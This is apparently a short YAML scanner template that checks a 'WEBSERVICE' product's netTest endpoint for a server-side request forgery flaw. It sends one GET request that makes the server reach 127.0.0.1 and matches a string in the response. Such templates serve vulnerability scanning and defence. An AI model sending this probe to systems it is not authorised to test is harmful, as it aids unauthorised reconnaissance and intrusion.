id: webservice-netTest-ssrf

info:
  name: WEBSERVICE netTest SSRF
  author: qwtd
  severity: high
  verified: true
  description: |
    WEBSERVICE netTest 接口存在SSRF漏洞。

rules:
  r0:
    request:
      method: GET
      path: /webs/netTest?action=list&group=TESTURL&szAddr=127.0.0.1
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(b'root.ERR.des')
expression: r0()